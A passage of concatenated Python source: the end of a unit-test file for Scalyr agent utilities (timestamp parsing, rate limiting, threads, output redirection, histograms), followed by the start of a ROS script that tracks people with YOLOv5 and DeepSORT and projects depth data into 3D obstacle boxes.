s = "2015-08-06 14:40:56.123456789Z"
expected = None
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_bad_format_has_timezone( self ):
# currently this function only handles UTC. Remove this test if
# updated to be more flexible
s = "2015-08-06T14:40:56.123456789+04:00"
expected = None
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch( self ):
s = "2015-08-06T14:40:56.123456Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_no_fractions( self ):
s = "2015-08-06T14:40:56"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_some_fractions( self ):
s = "2015-08-06T14:40:56.123Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123000 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_many_fractions( self ):
s = "2015-08-06T14:40:56.123456789Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000 + 789
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_too_many_fractions( self ):
s = "2015-08-06T14:40:56.123456789999Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 ) ) * 1000 + 789
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_nanoseconds_since_epoch_strange_value( self ):
s = "2017-09-20T20:44:00.123456Z"
expected = scalyr_util.microseconds_since_epoch( datetime.datetime( 2017, 9, 20, 20, 44, 00, 123456 ) ) * 1000
actual = scalyr_util.rfc3339_to_nanoseconds_since_epoch( s )
self.assertEquals( expected, actual )
def test_uuid(self):
first = scalyr_util.create_unique_id()
second = scalyr_util.create_unique_id()
self.assertTrue(len(first) > 0)
self.assertTrue(len(second) > 0)
self.assertNotEqual(first, second)
def test_remove_newlines_and_truncate(self):
self.assertEquals(scalyr_util.remove_newlines_and_truncate('hi', 1000), 'hi')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok then', 2), 'ok')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('o\nk\n', 1000), 'o k ')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok\n\r there', 1000), 'ok there')
self.assertEquals(scalyr_util.remove_newlines_and_truncate('ok\n\r there', 6), 'ok t')
def test_is_list_of_strings_yes( self ):
self.assertTrue( scalyr_util.is_list_of_strings( [ '*', 'blah', 'dah' ] ) )
def test_is_list_of_strings_no( self ):
self.assertFalse( scalyr_util.is_list_of_strings( [ '*', 3, { 'blah': 'dah' } ] ) )
def test_is_list_of_strings_none( self ):
self.assertFalse( scalyr_util.is_list_of_strings( None ) )
class TestRateLimiter(ScalyrTestCase):
def setUp(self):
super(TestRateLimiter, self).setUp()
self.__test_rate = RateLimiter(100, 10, current_time=0)
self.__current_time = 0
def advance_time(self, delta):
self.__current_time += delta
def charge_if_available(self, num_bytes):
return self.__test_rate.charge_if_available(num_bytes, current_time=self.__current_time)
def test_basic_use(self):
self.assertTrue(self.charge_if_available(20))
self.assertTrue(self.charge_if_available(80))
self.assertFalse(self.charge_if_available(1))
def test_refill(self):
self.assertTrue(self.charge_if_available(60))
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertFalse(self.charge_if_available(60))
self.advance_time(1)
self.assertTrue(self.charge_if_available(60))
class TestRunState(ScalyrTestCase):
def test_basic_use(self):
# We use a FakeRunState for testing just so we do not accidentally sleep.
run_state = FakeRunState()
self.assertTrue(run_state.is_running())
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 1)
run_state.stop()
self.assertFalse(run_state.is_running())
def test_sleeping_already_stopped(self):
run_state = FakeRunState()
run_state.stop()
run_state.sleep_but_awaken_if_stopped(1.0)
self.assertEquals(run_state.total_times_slept, 0)
def test_callbacks(self):
self.called = False
def on_stop():
self.called = True
run_state = FakeRunState()
run_state.register_on_stop_callback(on_stop)
run_state.stop()
self.assertTrue(self.called)
# Make sure it is immediately invoked if already stopped.
self.called = False
run_state.register_on_stop_callback(on_stop)
self.assertTrue(self.called)
class TestStoppableThread(ScalyrTestCase):
def setUp(self):
super(TestStoppableThread, self).setUp()
self._run_counter = 0
def test_basic_use(self):
# Since the ScalyrTestCase sets the name prefix, we need to set it back to None to get an unmolested name.
StoppableThread.set_name_prefix(None)
test_thread = StoppableThread('Testing', self._run_method)
self.assertEqual(test_thread.getName(), 'Testing')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix(self):
StoppableThread.set_name_prefix('test_name_prefix: ')
test_thread = StoppableThread('Testing', self._run_method)
self.assertEqual(test_thread.getName(), 'test_name_prefix: Testing')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_name_prefix_with_none(self):
StoppableThread.set_name_prefix('test_name_prefix: ')
test_thread = StoppableThread(target=self._run_method)
self.assertEqual(test_thread.getName(), 'test_name_prefix: ')
test_thread.start()
test_thread.stop()
self.assertTrue(self._run_counter > 0)
def test_basic_extending(self):
class TestThread(StoppableThread):
def __init__(self):
self.run_counter = 0
StoppableThread.__init__(self, 'Test thread')
def run_and_propagate(self):
self.run_counter += 1
while self._run_state.is_running():
self.run_counter += 1
self._run_state.sleep_but_awaken_if_stopped(0.03)
test_thread = TestThread()
test_thread.start()
test_thread.stop()
self.assertTrue(test_thread.run_counter > 0)
def test_exception(self):
class TestException(Exception):
pass
def throw_an_exception(run_state):
run_state.is_running()
raise TestException()
test_thread = StoppableThread('Testing', throw_an_exception)
test_thread.start()
caught_it = False
try:
test_thread.stop()
except TestException:
caught_it = True
self.assertTrue(caught_it)
def _run_method(self, run_state):
self._run_counter += 1
while run_state.is_running():
self._run_counter += 1
run_state.sleep_but_awaken_if_stopped(0.03)
class TestScriptEscalator(ScalyrTestCase):
def test_is_user_change_required(self):
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'steve')
self.assertTrue(test_instance.is_user_change_required())
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'czerwin')
self.assertFalse(test_instance.is_user_change_required())
def test_change_user_and_rerun_script(self):
(test_instance, controller) = self.create_instance('czerwin', 'fileA', 'steve')
self.assertEquals(test_instance.change_user_and_rerun_script('random'), 0)
self.assertEquals(controller.call_count, 1)
self.assertEquals(controller.last_call['user'], 'steve')
self.assertIsNotNone(controller.last_call['script_file'])
def create_instance(self, current_user, config_file, config_owner):
controller = TestScriptEscalator.ControllerMock(current_user, config_file, config_owner)
# noinspection PyTypeChecker
return ScriptEscalator(controller, config_file, os.getcwd() ), controller
class ControllerMock(object):
def __init__(self, running_user, expected_config_file, config_owner):
self.__running_user = running_user
self.__expected_config_file = expected_config_file
self.__config_owner = config_owner
self.last_call = None
self.call_count = 0
def get_current_user(self):
return self.__running_user
def get_file_owner(self, config_file_path):
assert self.__expected_config_file == config_file_path
if self.__expected_config_file == config_file_path:
return self.__config_owner
else:
return None
def run_as_user(self, user, script_file_path, script_binary, script_args):
self.call_count += 1
self.last_call = {
'user': user,
'script_file': script_file_path,
'script_binary': script_binary,
'script_args': script_args
}
return 0
class TestRedirectorServer(ScalyrTestCase):
"""Tests the RedirectorServer code using fakes for stdout, stderr and the channel.
"""
def setUp(self):
super(TestRedirectorServer, self).setUp()
# Allows us to watch what bytes are being sent to the client.
self._channel = FakeServerChannel()
# Allows us to write bytes to stdout, stderr without them going to the terminal.
self._sys = FakeSys()
self._server = RedirectorServer(self._channel, sys_impl=self._sys)
def test_sending_str(self):
self._server.start()
# Verify that the server told the channel to accept the next client connection.
self.assertEquals(self._channel.accept_count, 1)
# Simulate writing to stdout.
self._sys.stdout.write('Testing')
# Make sure we wrote a message to the channel
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, 'Testing')
def test_sending_unicode(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stdout.write(u'caf\xe9')
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 0)
self.assertEquals(content, u'caf\xe9')
def test_sending_to_stderr(self):
self._server.start()
self.assertEquals(self._channel.accept_count, 1)
self._sys.stderr.write('Testing again')
self.assertEquals(self._channel.write_count, 1)
(stream_id, content) = self._parse_sent_bytes(self._channel.last_write)
self.assertEquals(stream_id, 1)
self.assertEquals(content, 'Testing again')
def test_connection_failure(self):
# Set the channel to simulate a connection timeout.
self._channel.timeout_connection = True
caught_it = False
try:
# Make sure that we get an exception.
self._server.start()
except RedirectorError:
caught_it = True
self.assertTrue(caught_it)
def _parse_sent_bytes(self, content):
"""Parses the stream id and the actual content from the encoded content string sent by the server.
@param content: The string sent by the server.
@type content: str
@return: A tuple of the stream_id and the actual content encoded in the sent string.
@rtype: (int,str)
"""
prefix_code = content[0:4]
code = struct.unpack('i', prefix_code)[0]
stream_id = code % 2
num_bytes = code >> 1
self.assertEquals(len(content), num_bytes + 4)
decoded_str = content[4:].decode('utf-8')
return stream_id, decoded_str
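# Framing exercised by these redirector tests (a sketch of what _parse_sent_bytes() expects):
#     code  = num_bytes * 2 + stream_id      # stream_id: 0 = stdout, 1 = stderr
#     frame = struct.pack('i', code) + utf-8 bytes of the content
# e.g. stream_id=1 with content 'Hi' gives code = 2*2 + 1 = 5, so the frame is
# struct.pack('i', 5) + 'Hi'; parsing recovers stream_id = 5 % 2 = 1 and num_bytes = 5 >> 1 = 2.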
class TestRedirectorClient(ScalyrTestCase):
"""Test the RedirectorClient by faking out the client channel and also the clock.
"""
def setUp(self):
super(TestRedirectorClient, self).setUp()
self._fake_sys = FakeSys()
# Since the client is an actual other thread that blocks waiting for input from the server, we have to
        # simulate the time using a fake clock. That will allow us to wake up the client thread from time to time.
self._fake_clock = scalyr_util.FakeClock()
# The fake channel allows us to insert bytes being sent by the server.
self._client_channel = FakeClientChannel(self._fake_clock)
self._client = RedirectorClient(self._client_channel, sys_impl=self._fake_sys, fake_clock=self._fake_clock)
self._client.start()
# Wait until the client thread begins to block for the initial accept from the server.
self._fake_clock.block_until_n_waiting_threads(1)
def tearDown(self):
if self._client is not None:
self._client.stop(wait_on_join=False)
self._fake_clock.advance_time(set_to=59.0)
self._client.join()
def test_receiving_str(self):
# Simulate accepting the connection.
self._accept_client_connection()
self._send_to_client(0, 'Testing')
        # Wait until bytes have been written to stdout by the client thread.
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, 'Testing')
def test_receiving_unicode(self):
self._accept_client_connection()
self._send_to_client(0, u'caf\xe9')
self._fake_sys.stdout.wait_for_bytes(1.0)
self.assertEquals(self._fake_sys.stdout.last_write, u'caf\xe9')
def test_connection_timeout(self):
# We advance the time past 60 seconds which is the connection time out.
self._fake_clock.advance_time(set_to=61.0)
got_it = False
try:
# Even though we have not called stop on the thread or the server hasn't closed the connection,
# we should still see the client thread terminate because of the exception it raises.
self._client.join()
except RedirectorError:
got_it = True
self._client = None
self.assertTrue(got_it)
def test_close_from_server(self):
self._accept_client_connection()
self._send_to_client(-1, '')
# Even though we haven't called stop on the client thread, it should still end because the server sent
# the signal to stop/close.
self._client.join()
self._client = None
def test_stopped_during_connection(self):
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def test_stopped_during_reading(self):
self._accept_client_connection()
self._client.stop(wait_on_join=False)
        # We have to wake all threads so the client thread will notice it has been stopped.
self._fake_clock.wake_all_threads()
self._client.join()
self._client = None
def _accept_client_connection(self):
self._client_channel.simulate_server_connect()
def _send_to_client(self, stream_id, content):
encoded_content = unicode(content).encode('utf-8')
code = len(encoded_content) * 2 + stream_id
self._client_channel.simulate_server_write(struct.pack('i', code) + encoded_content)
class TestRedirectionService(ScalyrTestCase):
"""Tests both the RedirectorServer and the RedirectorClient communicating together.
"""
def setUp(self):
super(TestRedirectionService, self).setUp()
self._client_sys = FakeSys()
self._server_sys = FakeSys()
self._fake_clock = scalyr_util.FakeClock()
self._client_channel = FakeClientChannel(self._fake_clock)
self._server_channel = FakeServerChannel(self._client_channel)
self._client = RedirectorClient(self._client_channel, sys_impl=self._client_sys, fake_clock=self._fake_clock)
self._server = RedirectorServer(self._server_channel, sys_impl=self._server_sys)
self._client.start()
self._server.start()
def test_end_to_end(self):
self._server_sys.stdout.write('Test full')
self._server.stop()
self._client.stop()
class FakeServerChannel(RedirectorServer.ServerChannel):
"""A mock-like object for the ServerChannel that allows us to see if certain methods were invoked and with
what arguments.
"""
def __init__(self, client_channel=None):
# Gives the counts of the various methods.
self.close_count = 0
self.accept_count = 0
self.write_count = 0
# The last string that was used when invoking `write`.
self.last_write = None
# If set to True, when the server invokes `accept_client`, it will simulate a connection timeout.
self.timeout_connection = False
# If not None, the fake client channel to send the bytes from `write`.
self._client_channel = client_channel
def accept_client(self, timeout=None):
self.accept_count += 1
if not self.timeout_connection and self._client_channel is not None:
self._client_channel.simulate_server_connect()
return not self.timeout_connection
def write(self, content):
self.write_count += 1
self.last_write = content
if self._client_channel is not None:
self._client_channel.simulate_server_write(content)
def close(self):
self.close_count += 1
class FakeClientChannel(object):
"""Fakes out the RedirectorClient.ClientChannel interface.
This allows us to simulate the connection being accepted by the server and bytes being sent by the server.
"""
def __init__(self, fake_clock):
self._lock = threading.Lock()
self._allow_connection = False
self._pending_content = ''
self._fake_clock = fake_clock
def connect(self):
self._lock.acquire()
result = self._allow_connection
self._lock.release()
return result
def peek(self):
self._lock.acquire()
if self._pending_content is not None:
bytes_to_read = len(self._pending_content)
else:
bytes_to_read = 0
self._lock.release()
return bytes_to_read, 0
def read(self, num_bytes_to_read):
self._lock.acquire()
assert num_bytes_to_read <= len(self._pending_content)
result = self._pending_content[0:num_bytes_to_read]
self._pending_content = self._pending_content[num_bytes_to_read:]
self._lock.release()
return result
def close(self):
pass
def simulate_server_connect(self):
self._lock.acquire()
self._allow_connection = True
self._lock.release()
self._simulate_busy_loop_advance()
def simulate_server_write(self, content):
self._lock.acquire()
self._pending_content = '%s%s' % (self._pending_content, content)
self._lock.release()
self._simulate_busy_loop_advance()
def _simulate_busy_loop_advance(self):
self._fake_clock.advance_time(increment_by=0.4)
class FakeSys(object):
def __init__(self):
self.stdout = FakeSys.FakeFile()
self.stderr = FakeSys.FakeFile()
class FakeFile(object):
def __init__(self):
self._condition = threading.Condition()
self._last_write = None
def write(self, content):
self._condition.acquire()
self._last_write = content
self._condition.notifyAll()
self._condition.release()
@property
def last_write(self):
self._condition.acquire()
result = self._last_write
self._condition.release()
return result
def wait_for_bytes(self, timeout):
self._condition.acquire()
try:
if self._last_write is not None:
return
self._condition.wait(timeout)
finally:
self._condition.release()
class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
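        # (Presumably the estimator returns the midpoint of the containing bucket: 0, 3 and 4 all fall
        # in the 0-10 bucket whose midpoint is 5.0, which also matches the 17.5 and 75.0 expectations
        # below for the 10-25 and 50-100 buckets.)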
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)")
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(first[1], second[1], msg="The lower bounds do not equal")
self.assertAlmostEquals(first[2], second[2], msg="The upper bounds do not equal")
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
result.append((count, lower, upper))
return result
|
watchout_3.0.py
|
from subprocess import STDOUT
import sys
from tf.transformations import rotation_matrix
sys.path.insert(0, './yolov5')
from yolov5.utils.datasets import LoadImages, LoadStreams,LoadWebcam,LoadRealsense
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords
from yolov5.utils.torch_utils import select_device, time_synchronized
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import argparse
import os
import platform
import shutil
import time
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
'''
Watchout implemented directly on top of track.py; compared to v2.0 this adds
- goodenbox: golden-ratio cropping of the detection box (in practice KCF, which uses the depth
  of six sample points for its decision, works even better), matched up with Kang's algorithm
version: 3.0
'''
import numpy as np
from visualization_msgs.msg import Marker,MarkerArray
import rospy
from numba import jit
from tf import TransformListener
from APF_BASE_utils import BASE_TOOLS_for_car as To_1
from APF_FOLLOW_utils import FOLLOW_TOOLS_for_car as To_2
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def bbox_rel(*xyxy):
"""" Calculates the relative bounding box from absolute pixel values. """
bbox_left = min([xyxy[0].item(), xyxy[2].item()])
bbox_top = min([xyxy[1].item(), xyxy[3].item()])
bbox_w = abs(xyxy[0].item() - xyxy[2].item())
bbox_h = abs(xyxy[1].item() - xyxy[3].item())
x_c = (bbox_left + bbox_w / 2)
y_c = (bbox_top + bbox_h / 2)
w = bbox_w
h = bbox_h
return x_c, y_c, w, h
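# e.g. with scalar tensors for the corners (10, 20, 50, 80), bbox_rel returns
# x_c=30.0, y_c=50.0, w=40.0, h=60.0 -- the center-plus-size format DeepSORT expects.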
def compute_color_for_labels(label):
"""
Simple function that adds fixed color depending on the class
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def showdepth(boxes,depth):
for box in boxes:
x1,y1,x2,y2 = [int(i) for i in box]
for u in range(x1,x2):
for v in range(y1,y2):
print(depth[v,u]*0.001)
# note: offset shifts the box coordinates (optical-center offset)
def draw_boxes(img, bbox, identities=None, offset=(0, 0)):
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
        import math
        # golden-ratio crop: keep only the central band between 38.2% and 61.8% of the box,
        # matching the crop used in Watchout.create_box()
        w, h = x2 - x1, y2 - y1
        x1, x2 = x1 + math.ceil(0.382 * w), x1 + math.ceil(0.618 * w)
        y1, y2 = y1 + math.ceil(0.382 * h), y1 + math.ceil(0.618 * h)
# print(img.shape)
# print(x1,y1,x2,y2)
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
# cv2.rectangle(
# img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
# cv2.putText(img, label, (x1, y1 +
# t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
return img
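# A minimal standalone sketch (not called by the pipeline) of the golden-ratio crop used in
# draw_boxes() and Watchout.create_box(): only the region between 38.2% and 61.8% of the box
# (about 23.6% of its width and height) is kept, to strip background pixels around the person.
def _golden_crop_sketch(x1, y1, x2, y2):
    import math
    w, h = x2 - x1, y2 - y1
    u1, u2 = math.ceil(x1 + 0.382 * w), math.ceil(x1 + 0.618 * w)
    v1, v2 = math.ceil(y1 + 0.382 * h), math.ceil(y1 + 0.618 * h)
    return u1, v1, u2, v2
# e.g. _golden_crop_sketch(0, 0, 100, 100) -> (39, 39, 62, 62)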
class Watchout:
def __init__(self):
self.lasttime = rospy.Time.now()
self.thistime = rospy.Time.now()
self.scale = 0.001
self.idcenvel = [] #id cx,cy,vx,vy
        self.depth_thres = 10.0  # depth cutoff threshold (metres, after the 0.001 scale)
        # camera intrinsics
fx = 609.2713012695312
cx = 316.67022705078125
fy = 608.010498046875
cy = 244.8178253173828
self.K = np.array([[1.0/fx,0,-cx/fx],
[0,1.0/fy,-cy/fy],
[0.0 , 0.0, 1.0]])
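        # K here is the *inverse* of the usual pinhole intrinsics, so that
        # K.dot([u*d, v*d, d]) = [(u-cx)*d/fx, (v-cy)*d/fy, d], i.e. the back-projected
        # camera-frame coordinates used by create_box() and drawsquare().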
self.lines = [[0,1],[1,3],[3,2],[2,0],
[0,4],[2,6],[1,5],[3,7],
[4,5],[5,7],[7,6],[6,4]]
self.pub = rospy.Publisher('Personbox',MarkerArray,queue_size=1)
self.rate = rospy.Rate(10)
self.listener = TransformListener()
def watch(self,opt, save_img=False):
out, source,weights, view_img, save_txt, imgsz = \
opt.output, opt.source ,opt.weights, opt.view_img, opt.save_txt, opt.img_size
# initialize deepsort
cfg = get_config()
cfg.merge_from_file(opt.config_deepsort)
deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
use_cuda=True)
# Initialize
device = select_device(opt.device)
half = device.type != 'cpu' # half precision only supported on CUDA
# Load model
model = torch.load(weights, map_location=device)['model'].float() # load to FP32
model.to(device).eval()
if half:
model.half() # to FP16
# Set Dataloader
vid_path, vid_writer = None, None
if source=='0':
dataset = LoadWebcam(source,imgsz)
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
else:
dataset = LoadRealsense('0',img_size=imgsz)
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
# Get names and colors
names = model.module.names if hasattr(model, 'module') else model.names
# Run inference
t0 = time.time()
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
# run once
_ = model(img.half() if half else img) if device.type != 'cpu' else None
vis, pos_end = To_1.init(mapsize=150, scale=15)
# vis, pos_end, id_ = To_2.init(mapsize=150, scale=15)
for frame_idx, (path, img, im0, depth) in enumerate(dataset):
self.thistime = rospy.Time.now()
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = time_synchronized()
pred = model(img, augment=opt.augment)[0]
# Apply NMS
# [xyxy, conf, cls] n*6
pred = non_max_suppression(
pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)
t2 = time_synchronized()
# Print time (inference + NMS)
print('Done. (%.3fs)' % ( t2 - t1))
# Process detections
for i, det in enumerate(pred): # detections per image
im0 = im0.copy()
if det is not None and len(det):
                    # Rescale boxes from img_size to im0 size, i.e. fix up the xyxy coordinates
det[:, :4] = scale_coords(
img.shape[2:], det[:, :4], im0.shape).round()
bbox_xywh = []
confs = []
# Adapt detections to deep sort input format
                    # DeepSORT expects detections as center_x, center_y, w, h, confidence
for *xyxy, conf, cls in det:
x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
obj = [x_c, y_c, bbox_w, bbox_h]
bbox_xywh.append(obj)
confs.append([conf.item()])
xywhs = torch.Tensor(bbox_xywh)
confss = torch.Tensor(confs)
# Pass detections to deepsort
# outputs : x1 y1 x2 y2 id
outputs = deepsort.update(xywhs, confss, im0)
# draw boxes for visualization
if len(outputs) > 0:
bbox_xyxy = outputs[:, :4]
identities = outputs[:, -1]
draw_boxes(im0, bbox_xyxy, identities)
t3 = rospy.Time.now()
# self.publish3dbox(depth,bbox_xyxy,identities)
# if not self.init:
# import threading
# thread = threading.Thread(target=self.publish3dbox,args=(depth,bbox_xyxy,identities))
# thread.start()
# self.init = 1
                        # print('thread started successfully')
blocklist = self.twodbox(depth,bbox_xyxy,identities)
pos_now = (0, 0, 0, 0, 0)
vx, vy, w, f = To_1.Vis_and_deside(vis=vis, pos_now=pos_now,
pos_end=pos_end, blocklist=blocklist)
# vx, vy, w, f, id_ = To_2.Vis_and_deside(vis=vis, pos_now=pos_now,
# pos_end=pos_end, blocklist=blocklist,id_=id_)
                        print(f'Creating MarkerArray took {(rospy.Time.now()-t3).to_sec()} s')
print(self.idcenvel)
else:
deepsort.increment_ages()
# Stream results
if view_img:
cv2.imshow('watchout', im0)
if cv2.waitKey(1) == ord('q') or rospy.is_shutdown(): # q to quit
# thread.join()
print('Done. (%.3fs)' % (time.time() - t0))
raise StopIteration
self.lasttime = self.thistime
def goodenbox(self,bbox_xyxy):
pass
# @jit
def create_box(self,depth_img,box,offset=(0,0)):
        # back-projection formula: x = (u*depth - cx*depth)/fx, y = (v*depth - cy*depth)/fy
        # first multiply the pixel coordinates (u, v, 1) by depth
x1,y1,x2,y2 = [int(i) for i in box]
w = x2 - x1
h = y2 - y1
        # crop away the background using the golden ratio
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uv1 = []
for u in range(u1,u2):
for v in range(v1,v2):
depth = float(depth_img[v,u])*self.scale
if depth > self.depth_thres:
continue
else:
uv1.append([u*depth,v*depth,depth])
if(len(uv1)<1):
print("create_error")
return 0,0,None
# 3*n
uvd = np.array(uv1).T
        # multiply uvd by the camera intrinsics matrix K to get camera-frame xyz; note that
        # camera-frame xyz corresponds to yzx in the 3D world frame
# n*3
yzx = self.K.dot(uvd).T
        # use the mean in place of the centroid
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
        # find the eight corner vertices
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
from sensor_msgs.msg import PointCloud
pcl = PointCloud()
pcl.header.frame_id = '/camera'
        pcl.header.stamp = self.thistime
pcl.points.append((cx,cy,0))
pcl.points.append((xmax,ymax,zmax))
pcl.points.append((xmin,ymin,zmin))
        # transform points from the camera frame to the global (map) frame
import tf
try:
            self.listener.lookupTransform('/map', '/camera', rospy.Time(0))
        except:
